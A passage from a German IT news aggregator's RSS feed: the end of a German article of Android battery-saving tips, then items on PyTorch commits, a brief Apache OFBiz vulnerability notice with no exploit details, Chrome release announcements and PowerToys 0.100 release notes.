<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa0018e7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/bildwiderholrate.jpg?quality=50&amp;strip=all" alt="Bildwiederholrate Android" class="wp-image-3154583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Eine hohe <strong><em>Bildwiederholrate</em></strong> sorgt für eine flüssigere Darstellung, erhöht aber auch den Stromverbrauch. Wenn Sie Akku sparen wollen, können Sie die Bildwiederholrate verringern. Auf vielen aktuellen Smartphones lässt sich alternativ eine adaptive Bildwiederholrate nutzen, die je nach Inhalt automatisch zwischen niedrigen und hohen Bildraten wechselt und so den Energieverbrauch reduziert. Die entsprechende Option finden Sie in den Einstellungen unter <strong><em>“Anzeige”</em></strong> und <strong><em>“Bildwiederholrate”</em></strong>.</li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-3 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF3"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-3 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Bluetooth, NFC und GPS gezielt deaktivieren</h2>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa00237a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/verbindungen.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Verbindungen Android" class="wp-image-3154596" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Drahtlose Funktionen wie <strong><em>Bluetooth, GPS und NFC</em></strong> benötigen ebenfalls Energie. Wenn Sie diese gerade nicht nutzen, sollten Sie sie deaktivieren. Die entsprechenden Optionen finden Sie in den Einstellungen unter <strong><em>“Verbindungen”</em></strong>. Hier können Sie Bluetooth, NFC oder auch Ultra-Wideband (UWB) ausschalten.</li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-4 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF4"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-4 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Stromfresser-Apps aufspüren</h2>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa002b88"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/akku.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Akkuverbrauch Android" class="wp-image-3154611" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Auch Apps verbrauchen Energie. In den Akku-Einstellungen können Sie nachsehen, welche Anwendungen besonders viel Strom benötigen. Tippen Sie auf eine App, um weitere Informationen zu erhalten. Dort können Sie in vielen Fällen auch die Hintergrundaktivität einschränken. Die App bleibt dann nicht mehr aktiv, wenn Sie sie gerade nicht nutzen, was die Akkulaufzeit spürbar verbessern kann. Alternativ lohnt es sich, nicht benötigte Apps zu deinstallieren. Die Übersicht finden Sie in den Einstellungen unter <strong><em>“Akku”</em></strong> und <strong><em>“Grenzen der Hintergrundnutzung”</em></strong>.</li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-5 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF5"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-5 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Energiesparmodus, System-Updates und Neustart</h2>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa003373"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/neustart.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Energiesparmodus Android" class="wp-image-3154632" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Viele Smartphones verfügen über einen <strong><em>“Energiesparmodus”</em></strong>. Er verlängert die Akkulaufzeit, indem er bestimmte Funktionen einschränkt und die Leistung reduziert. Häufig können Sie zwischen einem normalen und einem besonders strikten Modus wählen, der nur die wichtigsten Funktionen zulässt. Praktisch ist zudem die Möglichkeit, den Energiesparmodus automatisch zu aktivieren, etwa wenn der Akkustand auf 20 Prozent fällt. Die entsprechende Option finden Sie in den Einstellungen unter <strong><em>“Akku”</em></strong> und <strong><em>“Energiesparmodus”</em></strong>.</li>



<li>Regelmäßige Updates erhöhen die Sicherheit und können auch die Systemleistung verbessern. Halten Sie Ihr Smartphone deshalb immer auf dem neuesten Stand und installieren Sie alle verfügbaren Aktualisierungen. Außerdem lohnt sich ein Neustart etwa einmal pro Woche.</li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-6 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF6"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-6 POST @@--></div>



<p>Weite Akku-Tipps finden Sie in unseren <a href="https://www.pcwelt.de/article/2976369/7-tipps-mehr-akkulaufzeit-auf-android.html" target="_blank" rel="noreferrer noopener">Tricks für 25 Prozent mehr Akkulaufzeit</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/719055fbee1551db2b6efcb2d089e23c305fb8f4: Fall back to eager _scaled_mm_v2 for swizzled scale layouts (#186384)]]></title>
<description><![CDATA[TorchInductor _scaled_mm_v2 lowering had no template or extern path for non-trivial swizzle patterns and asserted during compilation, breaking blockwise MXFP8/NVFP4 compile tests on Blackwell.
For swizzled scale layouts, defer to the eager _scaled_mm_v2 op before mm_args. The trivial-swizzle path...]]></description>
<link>https://tsecurity.de/de/3589698/downloads/trunk719055fbee1551db2b6efcb2d089e23c305fb8f4-fall-back-to-eager-scaledmmv2-for-swizzled-scale-layouts-186384/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589698/downloads/trunk719055fbee1551db2b6efcb2d089e23c305fb8f4-fall-back-to-eager-scaledmmv2-for-swizzled-scale-layouts-186384/</guid>
<pubDate>Thu, 11 Jun 2026 09:02:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TorchInductor <code>_scaled_mm_v2</code> lowering had no template or extern path for non-trivial swizzle patterns and asserted during compilation, breaking blockwise MXFP8/NVFP4 compile tests on Blackwell.</p>
<p>For swizzled scale layouts, defer to the eager <code>_scaled_mm_v2</code> op before mm_args. The trivial-swizzle path is unchanged.</p>
<p>Authored with Claude Opus 4.8.</p>
<p>rel: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/pytorch/pytorch/commit/9eb8bcb2f55f6c5c7e65d8a098127cba1be75b5c/hovercard" href="https://github.com/pytorch/pytorch/commit/9eb8bcb2f55f6c5c7e65d8a098127cba1be75b5c"><tt>9eb8bcb</tt></a></p>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598254984" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/186384" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/186384/hovercard" href="https://github.com/pytorch/pytorch/pull/186384">#186384</a><br>
Approved by: <a href="https://github.com/drisspg">https://github.com/drisspg</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50223 | Apache OFBiz up to 24.09.06 FreeMarker Template special elements used in a template engine (EUVD-2026-36167)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Apache OFBiz. This affects an unknown function of the component FreeMarker Template Handler. Performing a manipulation results in improper neutralization of special elements used in a template engine.

This vulnerability is reported as CVE-...]]></description>
<link>https://tsecurity.de/de/3589429/sicherheitsluecken/cve-2026-50223-apache-ofbiz-up-to-240906-freemarker-template-special-elements-used-in-a-template-engine-euvd-2026-36167/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589429/sicherheitsluecken/cve-2026-50223-apache-ofbiz-up-to-240906-freemarker-template-special-elements-used-in-a-template-engine-euvd-2026-36167/</guid>
<pubDate>Thu, 11 Jun 2026 05:25:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/apache:ofbiz">Apache OFBiz</a>. This affects an unknown function of the component <em>FreeMarker Template Handler</em>. Performing a manipulation results in improper neutralization of special elements used in a template engine.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-50223">CVE-2026-50223</a>. The attack is possible to be carried out remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/ce9267a4585256d1465a00a6a7687ce76f3784a5: Fetch tags in unified manywheel build job so release tags are detected]]></title>
<description><![CDATA[Release candidate builds triggered by a tag (e.g. v2.13.0-rc1) were
producing wheels that pinned triton to a dev-style version such as
triton==3.7.1+git5d6048aa instead of the release triton==3.7.1, which
then fails to install in the test job because that version does not
exist on the test index....]]></description>
<link>https://tsecurity.de/de/3589327/downloads/trunkce9267a4585256d1465a00a6a7687ce76f3784a5-fetch-tags-in-unified-manywheel-build-job-so-release-tags-are-detected/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589327/downloads/trunkce9267a4585256d1465a00a6a7687ce76f3784a5-fetch-tags-in-unified-manywheel-build-job-so-release-tags-are-detected/</guid>
<pubDate>Thu, 11 Jun 2026 03:31:31 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Release candidate builds triggered by a tag (e.g. v2.13.0-rc1) were<br>
producing wheels that pinned triton to a dev-style version such as<br>
triton==3.7.1+git5d6048aa instead of the release triton==3.7.1, which<br>
then fails to install in the test job because that version does not<br>
exist on the test index.</p>
<p>Root cause: the unified inline manywheel build job (cpu/cpu-aarch64/<br>
cuda/cuda-aarch64) checks out the raw commit via <code>ref: github.sha</code> with<br>
<code>fetch-depth: 2</code>. Checking out a bare SHA does not fetch the tag ref, so<br>
<code>tagged_version()</code> in .ci/pytorch/binary_populate_env.sh<br>
(<code>git describe --tags --exact</code>) fails and the build falls through to the<br>
<code>&lt;version&gt;.dev&lt;DATE&gt;</code> default. binary_populate_env.sh then takes its<br>
<code>.*dev.*</code> branch and appends <code>+git&lt;triton-shorthash&gt;</code> to the triton<br>
requirement that gets baked into the wheel metadata.</p>
<p>Fix: add <code>fetch-tags: true</code> to the inline build job checkout in the<br>
linux binary build template so the tag pointing at the checked-out<br>
commit is fetched, letting <code>git describe --tags --exact</code> succeed and the<br>
build resolve to the release version. The ROCm/XPU/s390x builds use the<br>
reusable _binary-build-linux.yml whose checkout has no pinned ref (it<br>
uses the default tag ref for a tag push) and are unaffected.</p>
<p>This is the same class of bug fixed for the older checkout-pytorch path<br>
in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271932621" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/180508" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/180508/hovercard" href="https://github.com/pytorch/pytorch/pull/180508">#180508</a>; this covers the inlined unified build job introduced since.</p>
<p>Test Plan:</p>
<p>Regenerated the workflows from the template and confirmed only the two<br>
linux manywheel workflows change, each gaining <code>fetch-tags: true</code> on its<br>
four unified build jobs:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python3 .github/scripts/generate_ci_workflows.py
git diff --stat .github/workflows
grep -c 'fetch-tags: true' \
  .github/workflows/generated-linux-binary-manywheel-nightly.yml \
  .github/workflows/generated-linux-aarch64-binary-manywheel-nightly.yml"><pre class="notranslate"><code>python3 .github/scripts/generate_ci_workflows.py
git diff --stat .github/workflows
grep -c 'fetch-tags: true' \
  .github/workflows/generated-linux-binary-manywheel-nightly.yml \
  .github/workflows/generated-linux-aarch64-binary-manywheel-nightly.yml
</code></pre></div>
<p>Validated the regenerated YAML parses and passes actionlint (the only<br>
reported shellcheck warnings are pre-existing on the base files):</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='python3 -c "import yaml; yaml.safe_load(open(f)) for f in (...)"
lintrunner --take ACTIONLINT \
  .github/workflows/generated-linux-binary-manywheel-nightly.yml \
  .github/workflows/generated-linux-aarch64-binary-manywheel-nightly.yml'><pre class="notranslate"><code>python3 -c "import yaml; yaml.safe_load(open(f)) for f in (...)"
lintrunner --take ACTIONLINT \
  .github/workflows/generated-linux-binary-manywheel-nightly.yml \
  .github/workflows/generated-linux-aarch64-binary-manywheel-nightly.yml
</code></pre></div>
<p>This PR was authored with the assistance of an AI coding assistant.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.14) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3588823/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588823/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Wed, 10 Jun 2026 22:24:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.14) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.2..150.0.7871.14?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 149 (149.0.7827.137) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know b...]]></description>
<link>https://tsecurity.de/de/3588765/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588765/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Wed, 10 Jun 2026 21:39:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 149 (149.0.7827.137) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.45..149.0.7827.137?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 150 (150.0.7871.15) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new ...]]></description>
<link>https://tsecurity.de/de/3588413/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588413/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Wed, 10 Jun 2026 18:57:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 150 (150.0.7871.15) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7872.3..150.0.7871.15?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D150">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.13) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
<link>https://tsecurity.de/de/3588410/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588410/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Wed, 10 Jun 2026 18:57:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.13) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.3..150.0.7871.13?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D150">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.100.0]]></title>
<description><![CDATA[Installer Hashes



Description
Filename
sha256 hash




Per user - x64
PowerToysUserSetup-0.100.0-x64.exe
A5EB64B8CEEF096AAFBFC18E73312B45E9D48FC60FB16676429688468C9A08D6


Per user - ARM64
PowerToysUserSetup-0.100.0-arm64.exe
A4D7EB580A7EF36E7C98CCC84E9EBB552C9D7071DCA35B6EB395F938D03FADCF


Ma...]]></description>
<link>https://tsecurity.de/de/3586429/downloads/release-v01000/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586429/downloads/release-v01000/</guid>
<pubDate>Wed, 10 Jun 2026 06:32:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/9866362/604704119-9b5c9996-6df9-480f-9f97-e6a0a4ee0f23.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNDExOS05YjVjOTk5Ni02ZGY5LTQ4MGYtOWY5Ny1lNmEwYTRlZTBmMjMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NGI5NWYwYjNmOTAxYjg3MzUzYjQ4MGI3NTc1NTIzMzE3YmE4OWVlYTk2NDI5ZmZkNDgzZGYwZmU1Y2RkZTAxMSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.0oHllVVeB_57daZrZYeLLeLwnYBcaOTrEUnS0n4f4V0"><img src="https://private-user-images.githubusercontent.com/9866362/604704119-9b5c9996-6df9-480f-9f97-e6a0a4ee0f23.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNDExOS05YjVjOTk5Ni02ZGY5LTQ4MGYtOWY5Ny1lNmEwYTRlZTBmMjMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NGI5NWYwYjNmOTAxYjg3MzUzYjQ4MGI3NTc1NTIzMzE3YmE4OWVlYTk2NDI5ZmZkNDgzZGYwZmU1Y2RkZTAxMSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.0oHllVVeB_57daZrZYeLLeLwnYBcaOTrEUnS0n4f4V0" alt="Hero image of what's new in version 0.100" content-type-secured-asset="image/png"></a></p>
<h2>Installer Hashes</h2>
<table>
<thead>
<tr>
<th>Description</th>
<th>Filename</th>
<th>sha256 hash</th>
</tr>
</thead>
<tbody>
<tr>
<td>Per user - x64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.0/PowerToysUserSetup-0.100.0-x64.exe">PowerToysUserSetup-0.100.0-x64.exe</a></td>
<td>A5EB64B8CEEF096AAFBFC18E73312B45E9D48FC60FB16676429688468C9A08D6</td>
</tr>
<tr>
<td>Per user - ARM64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.0/PowerToysUserSetup-0.100.0-arm64.exe">PowerToysUserSetup-0.100.0-arm64.exe</a></td>
<td>A4D7EB580A7EF36E7C98CCC84E9EBB552C9D7071DCA35B6EB395F938D03FADCF</td>
</tr>
<tr>
<td>Machine wide - x64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.0/PowerToysSetup-0.100.0-x64.exe">PowerToysSetup-0.100.0-x64.exe</a></td>
<td>740C01945528E453C02490921CA2BD0E399021A80CF90DCF01DB53158377D0E8</td>
</tr>
<tr>
<td>Machine wide - ARM64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.0/PowerToysSetup-0.100.0-arm64.exe">PowerToysSetup-0.100.0-arm64.exe</a></td>
<td>19C8BD93B9A42B7FC2FF0E6F2091590F8D89B98ADEA20CC73D9023E464707B12</td>
</tr>
</tbody>
</table>
<h4>Highlights</h4>
<p>PowerToys 0.100 introduces the <strong>brand-new Shortcut Guide</strong>, a major <strong>Command Palette update with the new Extension Gallery and multi-monitor Dock support</strong>, and a wave of improvements to Power Display. We've also <strong>upgraded PowerToys to .NET 10, improved auto-update reliability, reduced installer size</strong>, and continued modernizing the app experience across the suite.</p>
<hr>
<h2>⌨️ Introducing the new Shortcut Guide</h2>
